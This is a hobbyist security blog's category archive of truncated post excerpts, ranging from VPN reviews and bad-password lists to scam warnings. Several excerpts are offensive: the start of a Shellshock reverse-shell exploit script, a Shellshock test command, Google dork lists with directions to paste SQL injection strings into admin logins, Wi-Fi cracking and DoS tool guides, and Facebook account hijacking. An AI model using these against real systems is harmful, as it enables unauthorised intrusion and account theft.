Category Archives: Security

The best VPNs for Linux in 2018 (and the worst)

Ubuntu, Fedora, OpenSUSE, and Mint users often get the short end of the stick when it comes to software, and VPN services are no different. Let’s be honest: Linux users are low on the priority list for most companies and developers. That’s why we set out to find the best

Airport lounge

Hacker Builds a QR Code Generator That Lets Him Into Fancy Airport Lounges http://gizmodo.com/hacker-builds-a-qr-code-generator-that-lets-him-into-fa-1784884083/amp

WhatsApp News hidden features

FACEBOOK OPTION (iOS, Android and Windows Phone). You probably already knew that WhatsApp will add a Facebook option in its application. The Facebook option was born in the 2.12.14 iOS version as hidden feature and it was available in the 2.12.15 (iOS version) if you reinstalled it (WhatsApp developers did

Ps4 hack

Watch homebrew code run Steam games on the PS4 http://www.engadget.com/2016/05/22/steam-on-ps4-demo/

A lot’s of reasons NOT TO use Windows OS anymore

Microsoft is part of NSA’s mass surveillance program “PRISM”: https://en.wikipedia.org/wiki/PRISM_(surveillance_program) Microsoft informs the NSA about bugs before fixing them: https://archive.is/OBGB1 Microsoft openly offeres cloud data to support PRISM: https://archive.is/tW6fu Microsoft has backdoored its disk encryption: https://archive.is/2XIvX · https://archive.is/qLRZx Windows snoops on the users’ files, text input, voice input, location, contacts,

SecurityXploded

SecurityXploded – the community division of XenArmor – is a popular Infosec Research & Development organization offering FREE Security Softwares, latest Research Articles and FREE Training on Reverse Engineering & Malware Analysis. So far we have released 200+ FREE security softwares that has crossed over 10 Million Downloads worldwide. Most

1Block

Secure, passwordless authentication using Blockchain technology This is very interesting check the link above. Web sites and applications shouldn’t have to rely on problematic identification methods such as usernames and passwords. This is a human problem. This is a customer support problem. This is an industry problem. Using 1Block for

10 Worst Internet Security Mistakes

    1) “password” When you are choosing your passwords, what do you normally do? Do you optimize your passwords to the best security you can manage, or do you just type in “password” all of the time and let it be? You should never pick a simple password, anyone

Top 25 Worst Passwords of 2015

123456 password 12345678 qwerty 12345 123456789 football 1234 1234567 baseball welcome 1234567890 abc123 111111 1qaz2wsx dragon master monkey letmein login princess qwertyuiop solo passw0rd starwars

2016’s Biggest Phishing traps

Something to be aware in 2016.   Put them in your diary.   January – Samsung Galaxy S7 launch 27th Feb – 6 nations, rugby, England vs Ireland at Twickenham Feb – to March –  6 nations continues 6 march –  Mother’s day 16th march – Chancellor delivers the budget

What is Penetration Testing?… And Tools

What is Penetration Testing? It’s the method of testing where the areas of weakness in software systems in terms of security are put to test to determine, if ‘weak-point’ is indeed one, that can be broken into or not. Performed for: Websites/Servers/Networks How is it performed? Step #1. It starts

Five free pen-testing tools

Security assessment and deep testing don’t require a big budget. Some of most effective security tools are free, and are commonly used by professional consultants, private industry and government security practitioners. Here are a few to start with. For scanning in the first steps of a security assessment or pen

5 Tips to Reduce Risk from Web Threats

1. Keep your systems patched and up to date. Keeping systems fully up to date—including the operating system, web browsers, browser plugins, media players, PDF readers and other applications—can be a tedious, annoying and time-consuming ongoing task. Unfortunately, hackers are counting on most people to fall far short of what’s

Apple Mac persistent rootkit malware june 2015

Symantec says a critical vulnerability within some Apple Mac models could allow hackers to inject systems with persistent rootkit malware. The security firm confirmed the existence of the security flaw late on Thursday. The flaw, called the Apple Mac OS X EFI Firmware Security Vulnerability, was originally disclosed last week

Password Establishment Protocol

Network Working Group                                   Thomas Brownback Request for Comments: xxxx                        Independent Researcher Category: Experimental                  

Denial of Service Tools

Careful on this one and Antivirus marks it as positive. In computing, a denial of service (DoS) or distributed denial of service ( DDoS ) attack is an attempt to make a machine or network resource unavailable to its intended users. A DoS attack generally consists of efforts to temporarily

Promologic.com- Possible SCAM

They send email asking to put advert on your blog, like a freelancer called John.   Now the company looks  american , without any history behind.   The email is sent from an adsl connection as below   IP: 188.129.87.171   [DNS] – [Tracert] Name: cpe-188-129-87-171.dynamic.amis.hr  [Whois] Country: HR – Croatia 

LLT Consulting company – Possible SCAM!

Be careful on this ones. You probally will receive an email like that: Hello! My name is Josephine Bergson representing the advertising department of the LLT Consulting company. We are interested to place ads (banners), of your choice, on your websites. Design and sizes can be seen on our website

McAfee Free Tools

McAfee is committed to your security and provides an assortment of free McAfee tools to help in your software development. Simply select a tool and download it for free. For more details, read the McAfee Software Free Tools   A lot’s and mostly useful to the extreme. Nice one guys!

7 seven Worse stealth attacks in IT

Today’s most ingenious malware and hackers are just as stealthy and conniving. Here are some of the latest techniques of note that have piqued my interest as a security researcher and the lessons learned. Some stand on the shoulders of past malicious innovators, but all are very much in vogue

Splash Data report on Bad Passwords

While a lot of attention is given to high profile account breaches, the truth is many passwords are next to useless because of their simplicity. Each year, SplashData releases its list of the worst passwords. Many atop the latest list are repeat offenders, such as the top two, “123456” and

SQL INJECTION STRINGS LIST

SQL injection is a technique often used to attack data driven applications. This is done by including portions of SQL statements in an entry field in an attempt to get the website to pass a newly formed rogue SQL command to the database (e.g., dump the database contents to the attacker).

List of Dorks to find Admin Panel of a Website.

Copy and paste one of the dork from the list below to Google search engine. When Admin panel opens paste these sql injection string into the Username and password fields and click login. Change it , if you own a website! login.htm login.html login/ adm/ admin/ admin/account.html admin/login.html admin/login.htm admin/controlpanel.html

The Gentleman’s Guide To Forum Spies (spooks, feds, etc.)

    COINTELPRO Techniques for dilution, misdirection and control of a internet forum Twenty-Five Rules of Disinformation Eight Traits of the Disinformationalist How to Spot a Spy (Cointelpro Agent) Seventeen Techniques for Truth Suppression ______________________________________________________________________________________         COINTELPRO Techniques for dilution, misdirection and control of a internet forum.. There

Why Do People Get Computer Viruses

No one likes to seek out out that they’ve picked up one of many widespread pc viruses from being on-line. Yet so many individuals are unaware of the issues which might be on-line that may trigger injury to your system. If you’ve come to the web in hopes…

The Most Notorious Computer Viruses

Thinking of throwing away your laptop computer due to a malfunction of some type? Has a laptop computer half abruptly stopped functioning correctly? Is a program which used to run nice all of the sudden going haywire? Before you chalk it as much as hardware…

Crack WI-FI methods

Depends on the encryption of the wifi. If it’s WEP, then its generally fairly easy to crack using Aircrack-ng. However, WPA/WPA2 two will need to be forced with the following methods, these are just a few to keep in mind: -The evil twin method: Launch a DOS (via De-auth requests)

South Korean Malware Attack

  Executive Summary Reporting and technical details surrounding the malware used in the March 20, 2013, attack on South Korean assets have been varied and inconsistent. However, there are some commonalitie reported across multiple organizations that provide some level of insight into the malware, dubbed DarkSeoul. The common attributes of

10 Android hacking tools

Lets see 10 Android tools that are meant for hacking and hackers. 1.Hackode :- Hackode : The hacker’s Toolbox is an application for penetration tester, Ethical hackers, IT administrator and Cyber security professional to perform different tasks like reconnaissance, scanning performing exploits etc. 2.Androrat:- Remote Administration Tool for Android. Androrat is a client/server

Perfect OS for hacking.

Anonymous released their own operating system, based on Ubuntu and Mate. Should we download it…no, not really as they usually add troyan and malware in it…so you hack and then you get hacked…not funny.   Kali linux, backtrack OS, yes, but as above paranoia it’s in me so… best solution.

Anonymous Tips

  This is a simple guide for noobs on how to stay anonymous and safe in the clearweb and the darknet. If it seems “too good to be true” you better bet your ass it’s a scam! Assume everything is being monitored 24/7, is hacked/malware attacks, keyloggers, LEO/spies, and that

Intrusive Surveillance

Intrusive Surveillance basically means any type of surveillance that is occurring due to some form of intrusion into your machine. As such, it is the most difficult form of “forensics” to defend against, since doing so involves the securing and hardening of your operating system against attack. While keeping up

Network Attributes of your computer

  MAC Address Every 802.x network card (wireless, ethernet, token ring) has a unique 48 bit identifier known as a MAC address. This address is burned into the EEPROM on the card, and oftentimes is used by networking equipment to track users as they come and go, frequently associating MAC

Passwords/ Passwords (Thanks anonimous)

Choosing a Strong Password by @voodookobra – Educational article, great explanation. https://scott.arciszewski.me/blog/2014/08/choosing-strong-password Guide for creating strong passwords – Older article but still good info http://www.thegeekstuff.com/2008/06/the-ultimate-guide-for-creating-strong-passwords/ Passwords: Here’s how to make them harder to crack. > http://www.pcadvisor.co.uk/how-to/security/3446212/passwords-youre-doing-it-wrong-heres-how-to-make-them-uncrackable/ Handy tool for generating strong passwords > http://strongpasswordgenerator.com/ Passphrase generating tool > https://entima.net/diceware/ The

Snow Leopard bash vulnerability

Snow Leopard is vulnerable and am told more recent versions are too. The patch for Linux issued today didn’t fix it completely, so there will be another patch tomorrow. execute the following: env x='() { :;}; echo vulnerable’ bash -c “echo this is a test” Apparently, the proper behaviour is:

CVE-2014-6271 cgi-bin reverse shell (shellshock)

# #CVE-2014-6271 cgi-bin reverse shell # import httplib,urllib,sys if (len(sys.argv)<3):         print “Usage: %s <host> <vulnerable CGI>” % sys.argv[0]         print “Example: %s localhost /cgi-bin/test.cgi” % sys.argv[0]         exit(0) conn = httplib.HTTPConnection(sys.argv[1]) reverse_shell=“() { ignored;};/bin/bash -c ‘/bin/rm -f /tmp/f; /usr/bin/mkfifo /tmp/f;cat

ShellShock CVE-2014-6271

SETLOCAL ENABLEDELAYEDEXPANSION @echo off cls REM Windows ShellShock Vulnerability CVE-2014-6271 Scanner REM Version 1u0 <Initial release> REM 2014-09-25 REM By Taylor Swift (taylorswift -at- swiftonsecurity.com) title Windows ShellShock Vulnerability Scanner echo. echo =============== echo  Windows ShellShock Vulnerability CVE-2014-6271 Scanner echo    by Taylor Swift echo =============== echo. echo. echo PLEASE WAIT,

Hack into someone’s Facebook account

In this article I’ll show you these, and a couple other ways that hackers (and even regular folks) can hack into someone’s Facebook account. But don’t worry, I’ll also show you how to prevent it from happening to you. Method 1: Reset the Password The easiest way to “hack” into

You can steal data from a computer by touching it

by Jon Fingas |  Normally, breaking a PC’s security involves either finding security exploits or launching brute force attacks, neither of which is necessarily quick or easy. However, a team at Tel Aviv University has come up with a potentially much simpler way to swipe data from a computer: touch it. If you

50 Hacking tools

Hacking tools have been said to make hacking quite easy as compared to the old days. But, there is still more to being a hacker than just that. Yes, these tools have made it simple, but that is nothing unless you have the knowledge about other aspects of hacking as

Google Dorks 2014 List For SQL Injection Attack

about.php?cartID= accinfo.php?cartId= acclogin.php?cartID= add.php?bookid= add_cart.php?num= addcart.php? addItem.php add-to-cart.php?ID= addToCart.php?idProduct= addtomylist.php?ProdId= adminEditProductFields.php?intProdID= advSearch_h.php?idCategory= affiliate.php?ID= affiliate-agreement.cfm?storeid= affiliates.php?id= ancillary.php?ID= archive.php?id= article.php?id= phpx?PageID basket.php?id= Book.php?bookID= book_list.php?bookid= book_view.php?bookid= BookDetails.php?ID= browse.php?catid= browse_item_details.php Browse_Item_Details.php?Store_Id= buy.php? buy.php?bookid= bycategory.php?id= cardinfo.php?card= cart.php?action= cart.php?cart_id= cart.php?id= cart_additem.php?id= cart_validate.php?id= cartadd.php?id= cat.php?iCat= catalog.php catalog.php?CatalogID= catalog_item.php?ID= catalog_main.php?catid= category.php category.php?catid= category_list.php?id= categorydisplay.php?catid= checkout.php?cartid= checkout.php?UserID= checkout_confirmed.php?order_id= checkout1.php?cartid=

Security and Privacy Tips for the Paranoid

Turn off Java and Flash in your Web browsers icon-coffee  Java and Adobe Flash Player plug-ins are common points of vulnerability for many browsers. The two software platforms are useful and power a lot of interactive content on the Internet, but Justin Cappos, a professor of computer science at the Polytechnic

PROTECT YOURSELF against surveillance programs like PRISM, XKeyscore and Tempora

################################################################################ PROTECT YOURSELF against surveillance programs like PRISM, XKeyscore and Tempora ################################################################################ Credits at the end of the page. Due to extreme laziness the links are copy and paste.Ta Warning: Microsoft Windows is affected by PRISM. Using it may compromise your privacy. We strongly recommend replacing Windows with either Linux

DoS attack tools

The following are some of the tools that can be used to perform DoS attacks. Nemesy– this tool can be used to generate random packets. It works on windows. This tool can be downloaded from http://packetstormsecurity.com/files/25599/nemesy13.zip.html . Due to the nature of the program, if you have an anti virus,

Commonly Used Hacking Tools

The following table lists some of the most commonly used tools.   SR  NO. TOOLS DESCRIPTION URL Link 1  Nmap   Network mapper. This tool is used to explore networks and perform security audits.   http://nmap.org/ 2  Nessus   This tool can be used to perform; Remote vulnerability scanner Password

Password cracking tool

These are software programs that are used to crack user passwords. We already looked at a similar tool in the above example on password strengths. The website www.md5this.com uses a rainbow table to crack passwords. We will now look at some of the commonly used tools John the Ripper John

How to Secure wireless networks

In minimize wireless network attacks; an organization can adopt the following policies Changing default passwords that come with the hardware Enabling the authentication mechanism Access to the network can be restricted by allowing only registered MAC addresses. Use of strong WEP and WPA-PSK keys, a combination of symbols, number and

How to Crack Wireless Networks

WEP cracking Cracking is the process of exploiting security weaknesses in wireless networks and gaining unauthorized access. WEP cracking refers to exploits on networks that use WEP to implement security controls. There are basically two types of cracks namely; Passive cracking– this type of cracking has no effect on the

Password security

http://www.bbc.co.uk/news/blogs-magazine-monitor-26969276 Read the above and then I’m amused by the idea that L33tSP34k is a useful form of encryption. And ob-vee-uss-lee, storing your passwords on your phone is extremely secure!   So knowing that read this i’m @mµ$¢Ð þ¥ th¢ iТ@ th@t £33t$¶34k i$ @ µ$¢ƒµ£ ƒø®m øƒ ¢n箥¶tiøn. @nÐ

Secunia PSI – Scan outdated programs

I do not normally advertise other companies. However merit is due. This Secunia PSI is a free kit able to scan your PC and detect outdated software it scans software on your system and identifies programs in need of security updates to safeguard your PC against intrusions on your machine.

NSA kills based on metadata

http://beta.slashdot.org/story/201869 – Former NSA director admits to ordering kills based on metadata: These are the top comments from reddit as of 10 hours after it was posted to reddit. I’ve read the articles about this program. Essentially the NSA was identifying the SIM cards that suspected militants were using and

Does antivirus have a future?

Does antivirus have a future? Creators of malware are no longer script kiddies after kudos – they’re criminals after your cash. Wendy M Grossman asks if protection can keep pace with them Read More Here

Windows XP is no longer supported by Microsoft.

  This means organisations running Windows XP will no longer receive: new security updates, non-security hotfixes, free /paid assisted support options or online technical content updates.   Any new vulnerabilities discovered after support end will not be addressed by Microsoft.  The risks of continuing to run Windows XP include:  

Hide your IP address

Hide your IP address and protect your online identity with SafeIP. Also watch BBC IPLAYER overseas…sweet.   http://www.freesafeip.com/   How can I speed up browsing using SafeIP? Selecting a location nearest to you is the best way to ensure the fastest connection speeds. From the Dashboard tab, scroll down the